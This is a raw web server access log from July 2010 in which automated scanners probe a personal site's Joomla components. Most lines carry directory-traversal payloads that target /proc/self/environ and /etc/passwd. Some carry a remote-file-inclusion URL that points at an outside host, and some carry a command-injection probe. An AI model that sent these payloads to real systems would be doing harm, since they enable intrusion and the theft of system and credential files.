202.29.92.6 - - [30/Jul/2010:09:53:48 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
202.29.92.6 - - [30/Jul/2010:09:53:49 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:54:29 -0700] "GET /logs/access_100616.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:54:30 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:09:54:31 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:57:17 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:57:18 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
64.15.156.75 - - [30/Jul/2010:09:57:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:09:57:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
209.97.216.92 - - [30/Jul/2010:09:58:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:09:59:15 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
114.108.176.9 - - [30/Jul/2010:09:59:15 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:59:36 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:09:59:36 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:59:50 -0700] "GET /logs/access_100615.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:59:50 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:09:59:50 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:59:55 -0700] "GET /logs/access_100705.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:59:56 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:59:56 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:59:57 -0700] "GET /logs/access_100705.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:09:59:58 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:00:01 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:10:00:08 -0700] "GET /logs/access_100615.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
217.73.227.30 - - [30/Jul/2010:10:00:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:10:00:08 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:10:00:08 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:00:32 -0700] "GET /logs/access_100625.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:00:32 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:00:33 -0700] "GET /logs///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:00:50 -0700] "GET /logs/access_100529.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:00:51 -0700] "GET /logs/access_100615.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:00:52 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
114.108.151.149 - - [30/Jul/2010:10:00:52 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:27 -0700] "GET /logs/access_100529.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:27 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:28 -0700] "GET /logs/access_100529.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:28 -0700] "GET /logs////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:29 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:01:29 -0700] "GET /logs////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:10:01:56 -0700] "GET /logs/access_100627.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
74.50.20.76 - - [30/Jul/2010:10:02:01 -0700] "GET /logs/access_100627.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:02:22 -0700] "GET /logs/access_100625.log///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:02:22 -0700] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:02:23 -0700] "GET /logs///index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
64.15.156.75 - - [30/Jul/2010:10:02:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
64.15.156.75 - - [30/Jul/2010:10:02:29 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:14 -0700] "GET /logs/access_100615.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:15 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:15 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:16 -0700] "GET /logs/access_100615.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:20 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:04:20 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:05:55 -0700] "GET /logs/access_100625.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:06:09 -0700] "GET /logs/access_100625.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:07:23 -0700] "GET /logs/access_100628.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:07:58 -0700] "GET /logs/access_100628.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:08:03 -0700] "GET /logs/access_100629.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
92.60.176.46 - - [30/Jul/2010:10:08:04 -0700] "GET /logs/access_100629.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:09:48 -0700] "GET /logs/access_100705.log/index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:09:48 -0700] "GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:09:49 -0700] "GET /logs/index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:12:41 -0700] "GET /logs/access_100615.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:12:41 -0700] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:12:42 -0700] "GET /logs///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
208.80.194.38 - - [30/Jul/2010:10:12:53 -0700] "GET /weekend.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; Zune 2.0)" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /logs/access_100620.log%20//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:12:53 -0700] "GET /logs/access_100620.log%20//index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:10:13:15 -0700] "GET /logs/access_100625.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
213.189.224.16 - - [30/Jul/2010:10:13:16 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.brianwinterman.com"
213.189.224.16 - - [30/Jul/2010:10:13:16 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:13:16 -0700] "GET /logs/access_100705.log/index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
213.189.224.16 - - [30/Jul/2010:10:13:17 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:13:17 -0700] "GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
77.23.123.247 - - [30/Jul/2010:10:13:17 -0700] "GET /logs/index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:10:13:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:10:13:19 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
64.15.156.75 - - [30/Jul/2010:10:14:10 -0700] "GET /logs/access_100615.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
213.180.89.75 - - [30/Jul/2010:10:14:22 -0700] "GET /logs/access_100625.log///index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:10:15:12 -0700] "GET /logs/access_100623.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
89.31.116.11 - - [30/Jul/2010:10:15:14 -0700] "GET /logs/access_100623.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:16:56 -0700] "GET /logs/access_100705.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:16:57 -0700] "GET ///index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:16:58 -0700] "GET /logs////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:19:55 -0700] "GET /logs/access_100705.log////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:19:55 -0700] "GET ///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:19:56 -0700] "GET /logs////index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:39 -0700] "GET /logs/access_100628.log//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:40 -0700] "GET /logs/access_100628.log//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:47 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:47 -0700] "GET /index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:48 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:21:48 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:33 -0700] "GET /logs/access_100616.log%20//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:33 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:33 -0700] "GET /logs/access_100616.log%20//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:33 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:34 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:34 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:36 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:36 -0700] "GET /logs/access_100616.log%20//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:36 -0700] "GET /logs/access_100616.log%20//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:37 -0700] "GET /logs//index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:42 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:23:42 -0700] "GET /index2.php?option=com_ckforms&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:44 -0700] "GET /index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:44 -0700] "GET /index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:45 -0700] "GET /logs/access_100628.log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:45 -0700] "GET /logs/access_100628.log%20%20//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:46 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:24:47 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
208.43.99.195 - - [30/Jul/2010:10:25:20 -0700] "GET /logs/access_100615.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.brianwinterman.com"
189.21.153.139 - - [30/Jul/2010:10:25:23 -0700] "GET /logs/access_100629.log////index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.brianwinterman.com"
74.53.98.146 - - [30/Jul/2010:10:26:33 -0700] "GET /logs/access_100627.log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.banitech.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.brianwinterman.com"
